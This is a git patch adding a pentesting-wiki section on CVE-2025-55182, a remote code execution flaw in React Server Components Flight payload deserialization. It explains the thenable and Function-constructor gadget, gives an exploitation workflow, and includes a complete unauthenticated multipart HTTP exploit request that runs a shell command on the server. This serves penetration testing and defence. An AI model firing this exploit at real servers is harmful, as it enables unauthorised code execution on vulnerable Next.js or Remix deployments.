From 341bdaa80a630805ef829a1dee008ff26e469c4b Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 5 Dec 2025 18:45:46 +0000 Subject: [PATCH] =?UTF-8?q?Add=20content=20from:=20CVE-2025-55182=20?= =?UTF-8?q?=E2=80=93=20React=20Server=20Components=20RCE=20via=20Flight=20?= =?UTF-8?q?Payl...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- src/pentesting-web/deserialization/README.md | 45 ++++++++++++++++++++ 1 file changed, 45 insertions(+) diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index 85700bee5b1..f22aead35ca 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md @@ -1174,8 +1174,53 @@ Industrialized gadget discovery: - Validate with public multi-format PoCs (JSON/XML/YAML/Marshal) +### React Server Components Flight Payload Deserialization RCE (CVE-2025-55182) + +React Server Components (RSC) packages `react-server-dom-*` **19.0 → 19.2.0** deserialize any inbound Flight payload as if it were produced by a trusted client. The parser expects sequences of **Chunk** objects and resolves them as Promises, so a crafted object that merely exposes a `then` method (a *thenable*) is executed inside the server’s Node.js process before any integrity checks occur. Frameworks such as Next.js or Remix often pull these packages transitively, meaning an exposed `/app` Flight endpoint can be exploitable even when developers never authored “server actions.” + +The gadget used in current exploits abuses the fact that React Flight stores request state inside an internal `_response` object. When the attacker-controlled `then` runs, it can: + +- Override `_response._formData.get` with the Flight reference `$1:constructor:constructor`, which resolves to JavaScript’s `Function` constructor via the prototype chain. +- Populate `_response._prefix` with arbitrary JavaScript such as `process.mainModule.require('child_process').execSync('touch /tmp/rce_poc');`. +- Mark the payload as a `resolved_model` Chunk so the parser will later evaluate `_prefix + value` using that `Function` constructor, yielding unrestricted code execution. + +#### Practical exploitation workflow + +1. Send an unauthenticated `POST` (the blog PoC targets `/`) with `multipart/form-data` so multiple Chunk parts can be submitted in one request. +2. Part `name="0"` is JSON that mimics a resolved Chunk: it advertises `"status":"resolved_model"`, `"reason":-1`, and exposes a `then` field referencing `$1:__proto__:then` so React links it into the internal promise graph. +3. Embed the malicious `_response` object inside that Chunk, setting `_prefix` to the JavaScript payload and `_formData.get` to `$1:constructor:constructor`. +4. Provide a second part (`name="1"`) containing the Flight pointer `"$@0"`, forcing the server to treat the first part as active component data. +5. When the request is parsed, React resolves the fake Chunk, executes the attacker’s `then`, rewires `_response`, and finally instantiates a `Function` with the attacker-supplied `_prefix`, leading to arbitrary JS/OS command execution (e.g., creating `/tmp/rce_poc`). + +#### Multipart PoC payload + +
+Example unauthenticated Flight request + +```http +POST / HTTP/1.1 +Host: 192.168.120.206 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 +Next-Action: x +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad +Content-Length: 467 + +------WebKitFormBoundaryx8jO2oVc6SWP3Sad +Content-Disposition: form-data; name="0" + +{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('touch /tmp/rce_poc');","_formData":{"get":"$1:constructor:constructor"}}} +------WebKitFormBoundaryx8jO2oVc6SWP3Sad +Content-Disposition: form-data; name="1" + +"$@0" +------WebKitFormBoundaryx8jO2oVc6SWP3Sad-- +``` + +
+ ## References +- [OffSec – CVE-2025-55182 React Server Components Flight Payload Deserialization](https://www.offsec.com/blog/cve-2025-55182/) - Trail of Bits – Marshal madness: A brief history of Ruby deserialization exploits: https://blog.trailofbits.com/2025/08/20/marshal-madness-a-brief-history-of-ruby-deserialization-exploits/ - elttam – Ruby 2.x Universal RCE Deserialization Gadget Chain: https://www.elttam.com/blog/ruby-deserialization/ - Phrack #69 – Rails 3/4 Marshal chain: https://phrack.org/issues/69/12.html